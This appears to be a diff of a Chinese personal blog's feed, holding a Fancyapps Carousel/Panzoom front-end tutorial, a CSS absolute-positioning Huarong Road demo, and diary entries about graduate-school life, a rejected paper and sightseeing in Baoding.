    <div class="f-carousel__slide"><img alt="海巨人" src="1088.png" /><center>嗨,巨人!</center></div>
    </div>

    <div class="f-carousel__slide"> 中可以不只是 <img>


    ​设置好 #myCarousel 的样式 :

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    .f-carousel__dots>li:before{
    display: none;
    }

    span.f-carousel__dot {
    color: var(--text-primary);
    transition: color 0.5s ease-in-out;
    }

    #myCarousel {
    --f-carousel-slide-width: calc((100% - 60px) / 4);
    --f-carousel-spacing: 20px;

    --f-button-next-pos: 1rem;
    --f-button-prev-pos: 1rem;

    --f-button-width: 44px;
    --f-button-height: 44px;
    --f-button-border-radius: 50%;

    --f-button-color: #fff;
    --f-button-hover-color: #fff;
    --f-button-active-color: #fff;

    --f-button-bg: rgba(0, 0, 0, 0.5);
    --f-button-hover-bg: rgba(0, 0, 0, 0.8);
    --f-button-active-bg: rgba(0, 0, 0, 0.8);

    --f-button-svg-width: 22px;
    --f-button-svg-height: 22px;
    --f-button-svg-stroke-width: 3;
    }
    • --f-carousel-slide-width: calc((100% - 60px) / 4); 可以让一个页面显示中间 3 个页,左右两边显示 2 个半页。

    ​其它的都是设置 UI 样式了。


    ​注册对象:

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    const mapRange = (inputLower, inputUpper, outputLower, outputUpper, value) => {
    const INPUT_RANGE = inputUpper - inputLower;
    const OUTPUT_RANGE = outputUpper - outputLower;
    return (
    outputLower + (((value - inputLower) / INPUT_RANGE) * OUTPUT_RANGE || 0)
    );
    };

    new Carousel(document.getElementById('myCarousel'), {
    slidesPerPage: 1,
    dragFree: true,

    Dots: false,
    Panzoom: {
    decelFriction: 0.08,
    },

    on: {
    'Panzoom.beforeTransform': (carousel) => {
    carousel.slides.map((slide) => {
    const progress = carousel.getProgress(slide.index, true);

    const progress1 = mapRange(-4, 4, 50, -50, progress);
    slide.el.style.setProperty('--f-progress1', `${progress1}%`);

    const progress2 = mapRange(-4, 4, 50, -50, 1 - progress);
    slide.el.style.setProperty('--f-progress2', `${progress2}%`);
    });
    },
    },
    });

    ​这段代码可以让每次翻页只翻一个页面宽度。


    ​可以从 Options | Carousel from Fancyapps UI 获取想要修改的设置 API。

    ​控制 carousel 的函数:Methods | Carousel from Fancyapps UI

    ​一些执行后的派发事件:Events | Carousel from Fancyapps UI

    效果

    ​目前看来,这好像跟懒加载 Troy-Yang/hexo-lazyload-image: lazyload image plugin for Hexo. (github.com) 会有点冲突……或许可以在使用 carousel 的时候把懒加载关了。

    ​我说婷婷!这个插件貌似自带懒加载功能,将 src 属性改为 data-lazy-src 属性即可。

    Panzoom

    ​感觉像是非全屏的 fancybox。

    引入

    1
    2
    3
    4
    5
    <script src="https://cdn.jsdelivr.net/npm/@fancyapps/ui@5.0/dist/panzoom/panzoom.umd.js"></script>
    <link
    rel="stylesheet"
    href="https://cdn.jsdelivr.net/npm/@fancyapps/ui@5.0/dist/panzoom/panzoom.css"
    />

    使用

    ​创建对象:

    1
    2
    3
    <div class="f-panzoom" id="myPanzoom" style="background: #ff000020;">
    <img class="f-panzoom__content" src="665.png" alt="吉恩 · 格雷迈恩"/>
    </div>

    ​设置 CSS,如果 panzoom 里的元素实际大小大于所设定的大小,则会在渲染的时候自适应大小,而在鼠标移过去时缩放到原大小。

    1
    2
    3
    #myPanzoom {
    height: 300px;
    }

    ​注册对象:

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    const container = document.getElementById("myPanzoom");
    const instance = new Panzoom(container, {
    panMode: 'mousemove',
    mouseMoveFactor: 1.25,
    click: false,
    wheel: false
    });

    container.addEventListener("mouseenter", (event) => {
    if (!event.buttons) {
    instance.zoomToCover(event);
    }
    });

    container.addEventListener("mouseleave", () => {
    instance.zoomToFit();
    });

    演示

    吉恩 · 格雷迈恩

    Panzoom-Toolbar

    引入

    ​从 @fancyapps/ui CDN by jsDelivr - A free, fast, and reliable Open Source CDN 获取 panzoom.toolbar.esm.jspanzoom.toolbar.css 并引入。

    使用

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    <div class="f-panzoom" id="myPanzoomToolbar" style="background: #ff000020;">
    <img class="f-panzoom__content" src="1088.png" alt="海巨人"/>
    </div>

    <script>
    const options = {
    Toolbar: {
    display: ["zoomIn", "zoomOut", "toggle1to1", "toggleZoom", "panLeft", "panRight", "panUp", "panDown", "rotateCCW", "rotateCW", "flipX", "flipY", "fitX", "fitY", "reset", "toggleFS"],
    },
    };
    new Panzoom(document.getElementById("myPanzoomToolbar"), options, { Toolbar });
    </script>

    ​可以在 Toolbar 下的 display 中设置想要显示的工具栏按钮。

    演示

    海巨人

    Panzoom-Pins

    引入

    ​从 @fancyapps/ui CDN by jsDelivr - A free, fast, and reliable Open Source CDN 获取 panzoom.pins.esm.jspanzoom.pins.css 并引入。

    使用

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    <div class="f-panzoom" id="myPanzoomPins">
    <div class="f-panzoom__viewport">
    <div data-panzoom-pin data-x="48.8%" data-y="16.02%">
    <div title="You Are Here">
    <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M12 0a7.2 7.2 0 0 0-7.27 7.14C4.73 11.08 12 24 12 24s7.27-12.92 7.27-16.86A7.2 7.2 0 0 0 12 0Z"></path></svg>
    </div>
    </div>
    <img class="f-panzoom__content" src="477.png" alt="投火无面者" />
    </div>
    </div>

    <script>
    new Panzoom(document.getElementById("myPanzoomPins"), {
    // Custom options
    }, {
    Pins
    });
    </script>

    ​从 data-panzoom-pin 给图片上打一个 svg,感觉作用不大……

    data-x="48.8%" data-y="16.02%" 通过测量得到,案例中将坐标点打在投火无面者的火焰上。

    演示

    投火无面者

    移植一个牛逼的

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    42
    43
    44
    45
    46
    47
    48
    49
    50
    51
    52
    53
    54
    55
    <div class="f-carousel" id="parcelSandbox">
    <div class="f-carousel__slide"><img no-lazy alt="图腾魔像" data-lazy-src="234.png" /></div>
    <div class="f-carousel__slide"><img no-lazy alt="阴燃电鳗" data-lazy-src="223.png" /></div>
    <div class="f-carousel__slide"><img no-lazy alt="投火无面者" data-lazy-src="477.png" /></div>
    <div class="f-carousel__slide"><img no-lazy alt="艾雅 · 黑掌" data-lazy-src="653.png" /></div>
    <div class="f-carousel__slide"><img no-lazy alt="深渊魔物" data-lazy-src="655.png" /></div>
    <div class="f-carousel__slide"><img no-lazy alt="吉恩 · 格雷迈恩" data-lazy-src="665.png" /></div>
    <div class="f-carousel__slide"><img no-lazy alt="海巨人" data-lazy-src="1088.png" /></div>
    </div>

    <style>
    #parcelSandbox {
    height: 450px;
    }
    #parcelSandbox .f-carousel__slide {
    display: flex;
    justify-content: center;
    align-items: center;
    width: clamp(100px, 30vw, 200px);
    height: clamp(100px, 40vw, 300px);
    }
    #parcelSandbox img {
    --x: calc(var(--progress) * 100%);
    --y: calc((var(--progress) + 0.15) * 200%);
    --rot: calc(var(--progress) * 60deg);
    object-fit: cover;
    transform: translate(var(--x), var(--y)) rotate(var(--rot));
    transform-origin: 0% 100%;
    filter: drop-shadow(10px 10px 10px #888);
    }
    </style>

    <script>
    const mapRange = (inputLower, inputUpper, outputLower, outputUpper, value) => {
    const INPUT_RANGE = inputUpper - inputLower;
    const OUTPUT_RANGE = outputUpper - outputLower;
    return (
    outputLower + (((value - inputLower) / INPUT_RANGE) * OUTPUT_RANGE || 0)
    );
    };
    new Carousel(document.getElementById('parcelSandbox'), {
    Dots: false,
    slidesPerPage: 1,
    friction: 0.08,
    on: {
    'refresh Panzoom.beforeTransform': (carousel) => {
    carousel.slides.map((slide) => {
    let slide_progress = carousel.getProgress(slide.index, true);
    slide_progress = mapRange(-1, 1, 1 / 6, -(1 / 6), slide_progress);
    slide.el.style.setProperty('--progress', `${slide_progress}`);
    });
    },
    },
    });
    </script>
    ]]>
    @@ -1284,7 +1284,7 @@ /posts/Diary-20-%E5%80%92%E4%B8%80%EF%BC%81/ - 前言
            

    ​这是一篇姗姗来迟的 Diary……

    ​研二下学期结束了!即将迎来研三生活……

    整个学期

    ​计算得出居然跟上学期待的时间一样久,都是 137 天。

    ​我在这个学期大概洗了 141 次还是 142 次澡😇!

    气温波动图

    ​3 月,曾出现同一时刻福州 30+,保定零下的情况。

    ​4 月至 5 月,虽然当天最高温度福州与保定相当,但是保定在夜间要凉快很多。

    ​6 月的某段时间保定甚至比福州还要热。

    ​但接下来的 7 月就是大福州发威的时候了😬。

    正文

    7.1

    ​实验室里充满了散漫的氛围……似乎已经有了放暑假的感觉。而我还得抓紧时间审改论文😵‍💫。

    7.2

    万达
    万达

    万达广场

    ​琪琪要提桶跑路了,于是宿舍决定吃一顿散伙饭。

    ​打车前往保定的第二家万达。

    牛肉火锅自助
    牛肉火锅自助
    牛肉火锅自助

    ​这家店虽然定价人均¥100 往上,却依然能得到许多同学的推荐。

    ​吃了后觉得确实不错。肉很新鲜,甜品的质量也很好。

    ​里面还有荔枝自助?在北方可是很难吃到荔枝的,嘎嘎炫😋。

    圆滚滚

    ​吃完饭后,凡哥说他的肚子已经大到低头看不见脚了🤪!

    河北 附尸医阝

    ​冀大附院的灯坏了,看上去很不吉利啊😵!

    夜幕降临,你的故事又要结束了

    ​西望万博,云霞红彤彤的,引得大家来拍照。

    鸡水环清

    ​在古城保定,一亩泉又称鸡距泉,府河成就了古城昔日的辉煌。在保定滨河公园有一处壁画,上述“鸡水环清”的字样是这样的:“元代初年张柔在重建清苑郡城时曾作新渠,引鸡距泉(一亩泉)水入城。明代建文年,改保定之土城为砖城时,修筑护城河,引鸡距泉一亩泉水环绕古城。清澈河水与雄伟之保定古城构成鸡水环清胜景。”足见老保定的水色之美。一亩泉也因玫瑰芙蕖,香闻十里,飞鸟游鱼,各自鸣跃的动人景致,博得“小江南”的美名。

    ​大家决定走一走消消食。一路荒凉凉,黑乎乎的都没啥路灯,结果踩到了🐶💩😭。

    7.3

    向日葵
    向日葵

    向日葵

    ​给电瓶车充完电后,看到旁边开了好看的向日葵😍。

    7.4

    ​论文再次投出,这段时间真的觉得挺焦虑的,一直都很早起床😶‍🌫️。

    ​读了个计算机研究生,却要忙于各种文书工作😅。

    7.5

    😭😭😭去北京了
    😭😭😭😭
    投完论文就跑😭😭😭

    ​于是我憋不住了决定再去北京散散心。在去过几次后,觉得去北京还是蛮方便的,比去保定一些交通糟糕的县城景点要便捷得多。

    7.7

    ​其实两天前就收到了退稿意见,这天才看到,说是稿件不在收录范围内😅。

    Thank you for your submission to XXX.

    After carefully evaluating your manuscript submitted to the XXX journal, we are afraid to let you know that your paper cannot be considered for publication in the XXX and we did not send it for a detailed evaluation.

    The main reason for the rejection is that although your manuscript contains some interesting ideas, it has limited contributions related to the aims and scope of the journal. You may want to consider submitting your paper to a different target.

    Sorry that we don’t have good news for you and thank you for your interest in our journal.

    ​好家伙,只得再找一个。真麻烦啊。

    ​后面几天就在继续折腾这破论文了😭。

    7.10

    泛红的叶子

    ​马上就要离开学校了!但好像几个学期下来,在这样的时间点,心情也逐渐变得平静了。

    百日菊
    百日菊
    百日菊

    AI 识别说这是百日菊

    ​去万达买一下明天在车上吃的便当,顺便看看花。

    荷花
    荷花
    荷花
    荷花

    我说这是荷花

    银杏已经有点泛黄了

    ​今年的军训服装是短袖,还蛮好看的。

    准备就绪!

    7.11

    ​爷润了。不知道下学期的生活,将会怎样呢?

    ]]>
    + 前言
            

    ​这是一篇姗姗来迟的 Diary……

    ​研二下学期结束了!即将迎来研三生活……

    整个学期

    ​计算得出居然跟上学期待的时间一样久,都是 137 天。

    ​我在这个学期大概洗了 141 次还是 142 次澡😇!

    气温波动图

    ​3 月,曾出现同一时刻福州 30+,保定零下的情况。

    ​4 月至 5 月,虽然当天最高温度福州与保定相当,但是保定在夜间要凉快很多。

    ​6 月的某段时间保定甚至比福州还要热。

    ​但接下来的 7 月就是大福州发威的时候了😬。

    正文

    7.1

    ​实验室里充满了散漫的氛围……似乎已经有了放暑假的感觉。而我还得抓紧时间审改论文😵‍💫。

    7.2

    万达
    万达

    万达广场

    ​琪琪要提桶跑路了,于是宿舍决定吃一顿散伙饭。

    ​打车前往保定的第二家万达。

    牛肉火锅自助
    牛肉火锅自助
    牛肉火锅自助

    ​这家店虽然定价人均¥100 往上,却依然能得到许多同学的推荐。

    ​吃了后觉得确实不错。肉很新鲜,甜品的质量也很好。

    ​里面还有荔枝自助?在北方可是很难吃到荔枝的,嘎嘎炫😋。

    圆滚滚

    ​吃完饭后,凡哥说他的肚子已经大到低头看不见脚了🤪!

    河北 附尸医阝

    ​冀大附院的灯坏了,看上去很不吉利啊😵!

    夜幕降临,你的故事又要结束了

    ​西望万博,云霞红彤彤的,引得大家来拍照。

    鸡水环清

    ​在古城保定,一亩泉又称鸡距泉,府河成就了古城昔日的辉煌。在保定滨河公园有一处壁画,上述“鸡水环清”的字样是这样的:“元代初年张柔在重建清苑郡城时曾作新渠,引鸡距泉(一亩泉)水入城。明代建文年,改保定之土城为砖城时,修筑护城河,引鸡距泉一亩泉水环绕古城。清澈河水与雄伟之保定古城构成鸡水环清胜景。”足见老保定的水色之美。一亩泉也因玫瑰芙蕖,香闻十里,飞鸟游鱼,各自鸣跃的动人景致,博得“小江南”的美名。

    ​大家决定走一走消消食。一路荒凉凉,黑乎乎的都没啥路灯,结果踩到了🐶💩😭。

    7.3

    向日葵
    向日葵

    向日葵

    ​给电瓶车充完电后,看到旁边开了好看的向日葵😍。

    7.4

    ​论文再次投出,这段时间真的觉得挺焦虑的,一直都很早起床😶‍🌫️。

    ​读了个计算机研究生,却要忙于各种文书工作😅。

    7.5

    😭😭😭去北京了
    😭😭😭😭
    投完论文就跑😭😭😭

    ​于是我憋不住了决定再去北京散散心。在去过几次后,觉得去北京还是蛮方便的,比去保定一些交通糟糕的县城景点要便捷得多。

    7.7

    ​其实两天前就收到了退稿意见,这天才看到,说是稿件不在收录范围内😅。

    Thank you for your submission to XXX.

    After carefully evaluating your manuscript submitted to the XXX journal, we are afraid to let you know that your paper cannot be considered for publication in the XXX and we did not send it for a detailed evaluation.

    The main reason for the rejection is that although your manuscript contains some interesting ideas, it has limited contributions related to the aims and scope of the journal. You may want to consider submitting your paper to a different target.

    Sorry that we don’t have good news for you and thank you for your interest in our journal.

    ​好家伙,只得再找一个。真麻烦啊。

    ​后面几天就在继续折腾这破论文了😭。

    7.10

    泛红的叶子

    ​马上就要离开学校了!但好像几个学期下来,在这样的时间点,心情也逐渐变得平静了。

    百日菊
    百日菊
    百日菊

    AI 识别说这是百日菊

    ​去万达买一下明天在车上吃的便当,顺便看看花。

    荷花
    荷花
    荷花
    荷花

    我说这是荷花

    银杏已经有点泛黄了

    ​今年的军训服装是短袖,还蛮好看的。

    准备就绪!

    7.11

    ​爷润了。不知道下学期的生活,将会怎样呢?

    ]]>
    @@ -1311,7 +1311,7 @@ /posts/CSS-position-absolute/ - .desc { position: absolute; width: 100%; background: #ffffffa0; bottom: 0px; margin: 0 auto; text-align: center; color: #222; }

    参考

    正文

    ​一切复杂的位置布局都可以使用 position: absolute; 来解决!只要提供的数值准确。

    ​下面,我们来使用 position: absolute; 实现一个华容道的布局。

    华容道

    • 画布使用 aspect-ratio: 0.8;,保证宽度始终是高度的 0.8 倍。

    • 棋子的位置由 lefttop 属性控制,锚点在左上角。

    • 棋子的宽度由 width 控制其占父元素宽度的百分比。高度由图片大小决定。

    • 华容道的棋盘可视为是宽度 4,高度 5 的棋盘。依此求得各个数值。

    ​最终效果:

    张飞

    张飞

    曹操

    曹操

    马超

    马超

    赵云

    赵云

    关羽

    关羽

    黄忠

    黄忠

    士兵

    士兵

    士兵

    士兵

    士兵

    士兵

    士兵

    士兵

    ​源代码:

    <style>
    .desc {
    position: absolute;
    width: 100%;
    background: #ffffffa0;
    bottom: 0px;
    margin: 0 auto;
    text-align: center;
    color: #222;
    }
    </style>

    <div style="margin: 0 auto; width: 60%; aspect-ratio: 0.8; position: relative; background: #ffdfdf; box-shadow: 4px 4px 5px rgba(0, 0, 0, 0.5);">
    <div style="position: absolute; left: 0%; top: 0%; width: 25%;">
    <img style="margin: 0; max-width: 100%;" alt="张飞" src="ZhangFei.webp"/>
    <p class="desc">张飞</p>
    </div>
    <div style="position: absolute; left: 25%; top: 0%; width: 50%;">
    <img style="margin: 0; max-width: 100%;" alt="曹操" src="CaoCao.webp"/>
    <p class="desc">曹操</p>
    </div>
    <div style="position: absolute; left: 75%; top: 0%; width: 25%;">
    <img style="margin: 0; max-width: 100%;" alt="马超" src="MaChao.webp"/>
    <p class="desc">马超</p>
    </div>
    <div style="position: absolute; left: 0%; top: 40%; width: 25%;">
    <img style="margin: 0; max-width: 100%;" alt="赵云" src="ZhaoYun.webp"/>
    <p class="desc">赵云</p>
    </div>
    <div style="position: absolute; left: 25%; top: 40%; width: 50%;">
    <img style="margin: 0; max-width: 100%;" alt="关羽" src="GuanYu.webp"/>
    <p class="desc">关羽</p>
    </div>
    <div style="position: absolute; left: 75%; top: 40%; width: 25%;">
    <img style="margin: 0; max-width: 100%;" alt="黄忠" src="HuangZhong.webp"/>
    <p class="desc">黄忠</p>
    </div>
    <div style="position: absolute; left: 25%; top: 60%; width: 25%;">
    <img style="margin: 0; max-width: 100%;" alt="士兵" src="ShiBing.webp"/>
    <p class="desc">士兵</p>
    </div>
    <div style="position: absolute; left: 50%; top: 60%; width: 25%;">
    <img style="margin: 0; max-width: 100%;" alt="士兵" src="ShiBing.webp"/>
    <p class="desc">士兵</p>
    </div>
    <div style="position: absolute; left: 0%; top: 80%; width: 25%;">
    <img style="margin: 0; max-width: 100%;" alt="士兵" src="ShiBing.webp"/>
    <p class="desc">士兵</p>
    </div>
    <div style="position: absolute; left: 75%; top: 80%; width: 25%;">
    <img style="margin: 0; max-width: 100%;" alt="士兵" src="ShiBing.webp"/>
    <p class="desc">士兵</p>
    </div>
    </div>

    <div style="margin: -50px 0 0 -80px; width: calc(100% + 160px); height: 80px; background: #00000020;"></div>
    ]]>
    + .desc { position: absolute; width: 100%; background: #ffffffa0; bottom: 0px; margin: 0 auto; text-align: center; color: #222; }

    参考

    正文

    ​一切复杂的位置布局都可以使用 position: absolute; 来解决!只要提供的数值准确。

    ​下面,我们来使用 position: absolute; 实现一个华容道的布局。

    华容道

    • 画布使用 aspect-ratio: 0.8;,保证宽度始终是高度的 0.8 倍。

    • 棋子的位置由 lefttop 属性控制,锚点在左上角。

    • 棋子的宽度由 width 控制其占父元素宽度的百分比。高度由图片大小决定。

    • 华容道的棋盘可视为是宽度 4,高度 5 的棋盘。依此求得各个数值。

    ​最终效果:

    张飞

    张飞

    曹操

    曹操

    马超

    马超

    赵云

    赵云

    关羽

    关羽

    黄忠

    黄忠

    士兵

    士兵

    士兵

    士兵

    士兵

    士兵

    士兵

    士兵

    ​源代码:

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    42
    43
    44
    45
    46
    47
    48
    49
    50
    51
    52
    53
    54
    55
    56
    <style>
    .desc {
    position: absolute;
    width: 100%;
    background: #ffffffa0;
    bottom: 0px;
    margin: 0 auto;
    text-align: center;
    color: #222;
    }
    </style>

    <div style="margin: 0 auto; width: 60%; aspect-ratio: 0.8; position: relative; background: #ffdfdf; box-shadow: 4px 4px 5px rgba(0, 0, 0, 0.5);">
    <div style="position: absolute; left: 0%; top: 0%; width: 25%;">
    <img style="margin: 0; max-width: 100%;" alt="张飞" src="ZhangFei.webp"/>
    <p class="desc">张飞</p>
    </div>
    <div style="position: absolute; left: 25%; top: 0%; width: 50%;">
    <img style="margin: 0; max-width: 100%;" alt="曹操" src="CaoCao.webp"/>
    <p class="desc">曹操</p>
    </div>
    <div style="position: absolute; left: 75%; top: 0%; width: 25%;">
    <img style="margin: 0; max-width: 100%;" alt="马超" src="MaChao.webp"/>
    <p class="desc">马超</p>
    </div>
    <div style="position: absolute; left: 0%; top: 40%; width: 25%;">
    <img style="margin: 0; max-width: 100%;" alt="赵云" src="ZhaoYun.webp"/>
    <p class="desc">赵云</p>
    </div>
    <div style="position: absolute; left: 25%; top: 40%; width: 50%;">
    <img style="margin: 0; max-width: 100%;" alt="关羽" src="GuanYu.webp"/>
    <p class="desc">关羽</p>
    </div>
    <div style="position: absolute; left: 75%; top: 40%; width: 25%;">
    <img style="margin: 0; max-width: 100%;" alt="黄忠" src="HuangZhong.webp"/>
    <p class="desc">黄忠</p>
    </div>
    <div style="position: absolute; left: 25%; top: 60%; width: 25%;">
    <img style="margin: 0; max-width: 100%;" alt="士兵" src="ShiBing.webp"/>
    <p class="desc">士兵</p>
    </div>
    <div style="position: absolute; left: 50%; top: 60%; width: 25%;">
    <img style="margin: 0; max-width: 100%;" alt="士兵" src="ShiBing.webp"/>
    <p class="desc">士兵</p>
    </div>
    <div style="position: absolute; left: 0%; top: 80%; width: 25%;">
    <img style="margin: 0; max-width: 100%;" alt="士兵" src="ShiBing.webp"/>
    <p class="desc">士兵</p>
    </div>
    <div style="position: absolute; left: 75%; top: 80%; width: 25%;">
    <img style="margin: 0; max-width: 100%;" alt="士兵" src="ShiBing.webp"/>
    <p class="desc">士兵</p>
    </div>
    </div>

    <div style="margin: -50px 0 0 -80px; width: calc(100% + 160px); height: 80px; background: #00000020;"></div>
    ]]>
    @@ -1446,7 +1446,7 @@ /posts/Diary-19-%E5%80%92%E4%BA%8C%EF%BC%9F/ - 前言

    每日任务

    ​不出意外的话,这将是这个学期倒数第二篇 Diary 了,坚持住!勇士!相信圣光会在最需要你的时候显现🤩🤩🤩!

    正文

    6.17-6.21

    ​整理 6.16 在国博拍的照片中……国博真是太好玩了,我评价为北京最佳😭。为所拍的文物查阅各种资料,从中学习到了不少东西;为了便于更好地在网页上展示我在国博扫的货,还特意设计了一个前端方法,我真是太雅了🤤!

    ​歷史學家卡爾(E. H. Carr,1892~1982 年)曾說:「歷史是歷史家和歷史事實之間不斷交互作用的過程,是現在與過去無止盡的對話。」仔細分析這段話可以發現歷史存在「兩個時間和空間」,一個是歷史事件發生的時空環境,另一個是歷史家所處的時空環境,過去的歷史固然應該以過去的時空條件去解釋、理解其背景和意義,不過也必須注意到歷史家所存在的時間與空間,因為不同的歷史家處於不同的時間、空間,和歷史記錄的對話也將呈現不同的樣貌。

    ​同時,我們也必須有所警覺,長期以來的歷史記錄,以官方史家所撰寫的史書(正史)論述為主,多半以統治者的觀點書寫,因此必須多方蒐集各種史料,更為深入歷史情境,理解不同時代人們所存在的歷史時空環境,包括政治制度、社會規範,以及與外界互動的情形,才能對歷史日常有比較客觀的認識。

    ​挺感谢初中的历史老师,是她让我激发起了对历史的兴趣,让我不至于在国博里像个白痴一样漫无目的地参观。我犹记得她曾经说过的一句话:“这节课虽然中考不考,但是我认为这是一个中学生所应该了解的。”我能感受到她对这门学科真正的理解和热爱,而不是拘泥在教条中。我想,不拘泥于教条,不随人云亦云,拥有独立辩证思考的能力,能够以史为鉴并应用到其他领域中,才是学习历史的最大意义吧🤔。同时,我很鄙视那些德不配位,溜须拍马,见风使舵的“砖家”(不只于历史领域)。

    ​很多华丽的文物背后其实蛮恐怖的。

    ​我翻开历史一查,这历史没有年代,歪歪斜斜的每页上都写着“仁义道德”几个字。我横竖睡不着,仔细看了半夜,才从字缝里看出字来,满本都写着两个字是“吃人”!

    ——鲁迅

    ​同时感觉中国发展不平衡的现象十分明显🫥,这是一个复杂的社会问题。

    ​读研后开始喜欢逛博物馆,到现在也逛了不老少。整理照片的时候还发现曾在不同博物馆里看到了同样的东西,就挺搞笑的。

    6.23 特别篇——要润了再去莲池逛逛吧

    ​这天中午想去市区走走。坐公交去老校区解决一下午饭问题。午饭 Only¥9,真便宜呀真便宜。

    假 · 后母戊鼎

    ​岁逢辛卯。序属深秋,河北大学迎来九十华诞。时逢盛世,学府生辉,古城各界共瞻文化盛典。为感谢多年来河北大学传承文化、培育英才,建设银行保定分行特铸青铜鼎,以铭功铵绩,昭示来兹。其铭曰

    京畿名校,燕赵学府;九十看秋,创业奔流;
    求是先风,驾学诚行;心忧天下,历史使命;
    培育英才,桃李芬芳;银校携手,驰援相助;
    诚纳俊杰,良禽栖木;融资助收,服务师生;
    合作共赢,砥砺前行;奋翮高飞,再创辉煌。

    ​冀大博物馆前面的假 · 后母戊鼎。

    某花

    ​盛夏,又是河北花开放的另一高峰。

    保定军校

    ​保定陆军军官学校始建于 1902 年,前身为北洋陆军行营将弁学堂、陆军速成武备学堂、陆军预备大学堂等。1912 年正式创办保定陆军军官学校,1923 年 8 月停办。前后共培养出 11000 余名学生,仅后来成为将军的就有 1500 余人,被称为“将军的摇篮”。

    ​啊!河北保定!曾经也辉煌过。

    军校广场雕像 军校广场雕像
    军校广场雕像 军校广场雕像 军校广场雕像 军校广场雕像
    军校广场雕像
    将军摇篮简介

    ​雕塑主体是一位身着戎装骑马驰骋的将军代表,象征着保定军校是诞生将车的摇篮;

    ​圆柱与雕塑的方形基座组成天圆地方的文化符号,象征着需校学员——胸怀报国理想而驰聘于天地之间的志士;

    ​圆柱体的外形还代表“1”,表示保定军校是中国近代第一所正规化的军事院校;雕塑总高 19.02 米,象征着保定军校始办于 1902 年。基座的台阶为 9 级代表着保定军校共培养了 9 期学员;中心圆柱以环形的浮雕进行装饰,从而构成雕塑整体的有机组成部分。浮雕正面是 5 位军官全身正像,是保定军校所设置的 5 科专业的军人代表,周边的图案则是对步兵、骑兵、工兵、炮兵、辎重兵的形象化描述。

    棋类运动 棋类运动
    棋类运动

    ​无聊地把军校广场上的象棋棋盘复位,结果发现少了仨子😅。

    ​这个围棋不让把棋子拿开我都不知道该怎么下。

    保定军校

    ​啊!保定军校,上承北洋,下开黄埔。因为暑假前特想去广州逛逛,就想再来看看传说中“下开黄埔”的保定军校。

    保定军校纪念馆

    ​保定军校(1902~1923 年)是自晚清至民国时期,由直隶总督兼北洋大臣袁世凯在保定创办的一系列军事教育机构的统称,是中国军事大变革的重要标志,开创了近代中国正规化军事教育之先河。期间开办的北洋行营将弁学堂、北洋陆军速成武备学堂、陆军部陆军速成学堂、陆军军官学堂(陆军预备大学堂)、陆军军官学校等学校。其中,民国建立后开办的陆军军官学校,是中国近代史上规模最大、设施最完备、学制最正规、门类最齐全的军事学府,自 1912 年开办到 1923 年停办,共办 9 期,设步科、骑科、炮科、工科、辎重科等兵科,经历赵理泰、蒋方震、曲同丰、王汝贤、杨祖德、贾德耀、张鸿绪、孙树林等 8 位校长,毕业学生 6574 人。从 1902 年开办的北洋行营将升学堂算起,这里共培养出 11000 余名军事领导人才,仅后来成为将军的有 2000 余人,被誉为“将军摇篮”。其中,蒋介石、张群、李济深、陈调元、叶挺、邓演达、赵博生、董振堂、蒋光鼐、陈铭枢、刘文辉、唐生智、张治中、傅作义、顾祝同、黄琪翔、钱大钧、张克侠、何基沣、陶峙岳、陈诚、白崇禧等均为中国近现代史上的风云人物,保定军校也因此蜚声海内外。

    陆军军官学校

    ​恭喜!保定军校从 2 月份检修到现在还不给开😠!

    大慈阁

    大慈阁 大慈阁
    大慈阁

    ​坐公交车前往市中心。

    西大街

    直隶第一街 直隶第一街
    月满西街 · 情定古城 人民照像稻香村 可爱熊熊
    直隶第一街

    ​经过保定政府苦心经营,西大街总算有了些许生气!

    民国风

    ​感觉像上下杭。

    套圈圈

    ​在保定,感觉这种项目特别多。我若去玩,必白送钱。

    老乡你好

    ​我要笑死。

    前面的区域,以后再来探索吧!

    ​前面好像是开什么音乐会,不让进。

    清河道署

    保定水利博物馆

    ​来参观一下之前从未去过的一个小博物馆——清河道署!是清朝直隶时期管理水利的地方。啊!河北保定!曾经也辉煌过。

    保定水利博物馆
    保定水利博物馆 保定水利博物馆 保定水利博物馆 保定水利博物馆 保定水利博物馆
    开冲!

    ​没人,不用预约,不用钱,身份证给保安,爷冲了!

    保定水系

    ​啊!河北保定!拒马河府河白洋淀,都属于海河水系。

    一定要根治海河
    一定要根治海河 一定要根治海河 一定要根治海河 一定要根治海河 一定要根治海河 一定要根治海河
    一定要根治海河

    ​中华人民共和国成立后,毛泽东主席发出了一定要根治海河的号召。自 1958 年开始,海河流域人民按照统一规划、综合治理的方针,从上游到下游,从支流到干流,对海河水系进行了全面根治。上百万治河大军包括中小学生、家庭妇女也挥锨上阵,完成了大大小小一系列整修工程,从根本上对海河进行了治理,终于使海河旧貌换新颜。

    ​海河自天津市区的三岔河口贯穿市区,至大沽口处入海,自古以来就养育了天津人民。海河对天津城市的形成和发展起了举足轻重的作用,但是,在旧时代也给海河流域的人民带来过不少灾难。海河水系支流众多,一到汛期同时涨水,而入海口处却肚大嘴小,宣泄不畅,水流速度越来越慢,泥沙沉积日益严重,排洪能力越来越差,常常形成海河流域的洪涝灾害,给广大人民群众的生活和海河地区社会经济发展造成很大危害。据记载,从 1368 年到 1948 年的 580 年间,海河流域发生过 387 次严重水灾,天津市被淹泡过 70 多次。

    ​河北省地级市天津被水淹了!河北省会保定不能坐视不管😭!

    7.21 暴雨

